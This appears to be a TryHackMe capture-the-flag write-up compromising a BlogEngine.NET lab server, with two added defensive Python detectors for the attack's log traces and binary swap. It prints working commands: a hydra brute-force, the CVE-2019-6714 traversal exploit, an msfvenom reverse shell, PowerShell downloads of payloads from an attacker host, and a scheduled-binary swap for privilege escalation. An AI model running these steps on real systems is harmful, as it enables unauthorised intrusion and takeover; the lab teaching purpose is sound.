HackPack – TryHackMe
CTF Challenge
click the link to show the procedure with images
HackPack (html version of my notes in Joplin)
TOOLS USED: Nmap, Burp, Hydra, Meterpreter, Winpeas and others
Target IP: 10.10.31.124
Task 1
scan the target ip:
nmap -p- -sV -sC -oN nmap-all -T4 -Pn 10.10.31.124
At this point we open port 80 in the browser, where the home page gives us the answer to the first question
– What's the name of the clown displayed on the homepage?
– pennywise
Task 2
From the home page we check the source code and the other pages; after pressing the burger menu (top right) we discover a login page at /admin
To be sure, we also run gobuster to find any other hidden directories before moving on
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -u 10.10.31.124
It picked up a lot of search directories and a few others, but our interest stays on /admin
While gobuster was working I went to the browser and looked for “blogengine default credentials” and discovered that they are admin:admin.
Although, typing those, we aren’t able to log in. We keep admin as the username and use hydra to look for the password.
But first we use Burp to intercept the login request and find the first answer
– What request type is the Windows website login form using?
– POST
Now we can use Hydra
hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.31.124 http-post-form "/Account/login.aspx:__VIEWSTATE=9il1lfwD7z3650sgscKbmxa1Kw086WYNaycWzUhOYKqAExKpRbcZyZxklwuzotjjJoI6Nfo1bcbmG8a9Fzrhnk91K6V64w08lBNCrDxV02T9xh8%2BT4sDA5f1PAFpf1R6ClLOWofti%2FmD1Znm12DPTjDj35tOo9U11eMZ%2BVY53OfEI452xh%2Bz7Z76ZyJVfi6ogep8q%2BSkBfk5CHqnGPNYkcbXQJb8iUyTYbi6kglUL%2BsHLTiZCL12KSYJtiwN0QwTmN24%2F74qhO98%2BP6FSeAzAPfCnZDDrPjdXh7vOdk%2Fq%2FA%2BB6bolEAI91%2BM5XbP4v%2F2MLeu%2BdcSENrZoTR8q1LDaj2xFCt3HIefni4%2FMAug%2F45%2BTgp8&__EVENTVALIDATION=WAoBqw2g1eK49jrQPzW2%2FIe8WGlB%2FBc%2FIs8%2BO9rpQ30OPjEgc7Z0w4Q%2FY6vOmxyexmPXwfJ7xfDDNiU1twBWJYNnI2UQIYeaGxrhnk3Ic%2BM4wgp3ty%2F%2Fgp7zsZLnJpRiUpe%2BGStLBkNJtQVz6C%2B8byrJV98%2FDcld%2BeWApW6kEk1n0EzV&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed"
– Guess a username, choose a password word-list and gain credentials to a user account!
– 1qaz2wsx
Task 3
Now that we have access, we look for vulnerabilities that can be exploited. On the About page we find the version of BlogEngine
– Now you have logged into the website, are you able to identify the version of the BlogEngine?
– 3.3.6.0
Now we use searchsploit (or a web-based exploit search) to look for an exploit and copy it to our folder
searchsploit BlogEngine.net 3.3.6
searchsploit -m exploit/aspx/webapps/46353.cs
– What is the CVE?
– CVE-2019-6714
Open the file with nano, read the instructions and change the IP address to yours (the port can be changed as well)
As the instructions in the file say, save it as PostView.ascx and start a listener
nc -nlvp 6576
Now, on the website, we go to Posts –> New post and upload the file
Once that is done we keep following the instructions, navigate to http://10.10.31.124/?theme=../../App_Data/files and we get the shell
– Who is the webserver running as?
– iis apppool\blog
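As an added defensive example (not part of the original notes), the following detector runs over constructed IIS-style log lines and flags the two events this walkthrough produces on the server side: a burst of POSTs to /Account/login.aspx from a single source, and a theme parameter that contains a path-traversal sequence. The log field layout, the sample addresses and the threshold are assumptions made for the example.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Constructed sample in a reduced IIS W3C layout:
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status ("-" = empty query)
SAMPLE_LOG = """\
2024-01-01 10:00:01 203.0.113.5 GET / - 200
2024-01-01 10:00:05 203.0.113.5 POST /Account/login.aspx - 200
2024-01-01 10:00:05 203.0.113.5 POST /Account/login.aspx - 200
2024-01-01 10:00:06 203.0.113.5 POST /Account/login.aspx - 200
2024-01-01 10:00:06 203.0.113.5 POST /Account/login.aspx - 200
2024-01-01 10:00:07 203.0.113.5 POST /Account/login.aspx - 200
2024-01-01 10:00:07 203.0.113.5 POST /Account/login.aspx - 302
2024-01-01 10:03:10 203.0.113.5 GET / theme=..%2F..%2FApp_Data%2Ffiles 200
2024-01-01 10:04:00 198.51.100.9 GET / theme=Standard 200
"""

LOGIN_PATH = "/Account/login.aspx"
LOGIN_THRESHOLD = 5  # assumed: more POSTs than this from one source is suspicious
TRAVERSAL = re.compile(r"\.\.[\\/]")  # "../" or "..\" after URL decoding

def parse_line(line):
    fields = line.split()
    if len(fields) != 7:
        return None
    _date, _time, ip, method, stem, query, status = fields
    return {"ip": ip, "method": method, "stem": stem,
            "query": "" if query == "-" else query, "status": int(status)}

def detect(log_text, threshold=LOGIN_THRESHOLD):
    """Return a list of (rule, detail) alerts found in the log text."""
    alerts = []
    login_posts = defaultdict(int)
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec is None:
            continue
        if rec["method"] == "POST" and rec["stem"].lower() == LOGIN_PATH.lower():
            login_posts[rec["ip"]] += 1
        # decode each query value once so ..%2F and ../ are treated alike
        for part in rec["query"].split("&"):
            key, _, value = part.partition("=")
            if key.lower() == "theme" and TRAVERSAL.search(unquote(value)):
                alerts.append(("theme-traversal", f"{rec['ip']} {unquote(value)}"))
    for ip, n in login_posts.items():
        if n > threshold:
            alerts.append(("login-bruteforce", f"{ip} {n} POSTs to {LOGIN_PATH}"))
    return alerts
```

The brute-force rule counts attempts regardless of status code, since BlogEngine returned 200 with "Login failed" in the body for wrong passwords, which is exactly what the hydra command above keys on.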
Task 4
Note: the target IP address changed to 10.10.252.126 as I had to restart the machine
Now we need to create a payload with meterpreter:
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.x.x.x LPORT=7766 -f exe -o shell.exe
In another terminal we start a Python web server to serve the payload
python3 -m http.server 8888
and from the previously gained shell we download the payload (into C:\Windows\Temp)
powershell -c "Invoke-WebRequest -Uri 'http://10.9.1.77:8888/shell.exe' -OutFile 'c:\Windows\Temp\shell.exe'"
Now we set up the handler in Metasploit, adjusting its options to match the payload
Run the payload on the target machine and watch the session start
From here, type sysinfo to check the OS
– What is the OS version of this windows machine?
– Windows 2012 R2 (6.3 Build 9600)
We move to Program Files looking for a binary we can replace with a payload in order to escalate privileges
cd "c:\program files (x86)"\SystemScheduler
Checking Events\20198415519.INI_LOG.txt we see that Message.exe runs every 30 seconds
Inside this folder, c:\Program Files (x86)\SystemScheduler, we rename Message.exe to Message.bak
mv Message.exe Message.bak
On our local machine we rename the shell.exe payload to Message.exe and upload it to the same folder on the target machine
powershell -c "Invoke-WebRequest -Uri 'http://10.9.1.77:8888/Message.exe' -OutFile 'c:\Program Files (x86)\SystemScheduler\Message.exe'"
The scheduler will now execute the payload automatically every 30 seconds and we get the shell
On the Admin desktop we find root.txt
On Jeff’s desktop we find the other flag
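The escalation in this task works because a low-privileged account can overwrite the binary that SystemScheduler runs every 30 seconds. As an added defensive example (not part of the original notes), here is a small integrity check that baselines a scheduler folder and reports not only a modified binary but also the tell-tale "renamed original" (a new file whose content matches a baselined one, as with Message.exe -> Message.bak). The folder and file contents in demo() are constructed in a temporary directory.

```python
import hashlib
import os
import tempfile

def sha256_of(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def snapshot(directory):
    """Map file name -> sha256 for every regular file in the directory."""
    return {name: sha256_of(os.path.join(directory, name))
            for name in sorted(os.listdir(directory))
            if os.path.isfile(os.path.join(directory, name))}

def compare(baseline, current):
    """Return (finding, detail) pairs describing how current differs from baseline."""
    findings = []
    by_hash = {digest: name for name, digest in baseline.items()}
    for name, digest in current.items():
        if name not in baseline:
            # a file that was not there before; if its content matches a baselined
            # binary, the original was renamed rather than deleted
            if digest in by_hash:
                findings.append(("renamed-original", f"{by_hash[digest]} -> {name}"))
            else:
                findings.append(("new-file", name))
        elif digest != baseline[name]:
            findings.append(("modified", name))
    for name in baseline:
        if name not in current:
            findings.append(("missing", name))
    return findings

def demo():
    """Constructed scenario: baseline a scheduler folder, then swap its binary."""
    with tempfile.TemporaryDirectory() as d:
        exe = os.path.join(d, "Message.exe")
        with open(exe, "wb") as f:
            f.write(b"original scheduler binary (constructed)")
        baseline = snapshot(d)
        os.rename(exe, os.path.join(d, "Message.bak"))   # the .bak left behind
        with open(exe, "wb") as f:
            f.write(b"replacement binary (constructed)")
        return compare(baseline, snapshot(d))
```

In practice the baseline would be stored outside the monitored folder and compared on a schedule; the underlying fix is to make sure the scheduled binary's directory is not writable by the account the web server runs as.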
Task 5
From the meterpreter session, we type shell to enter powershell
With the Python web server running as before, we transfer the winPEAS.bat file to the target machine
powershell -c "Invoke-WebRequest -Uri 'http://10.9.1.77:8888/winPEAS.bat' -OutFile 'c:\Windows\Temp\winPEAS.bat'"
We run winPEAS with .\winPEAS.bat and wait
Under the system information list we find a line stating “Original Install Date”, which gives us the answer to the last question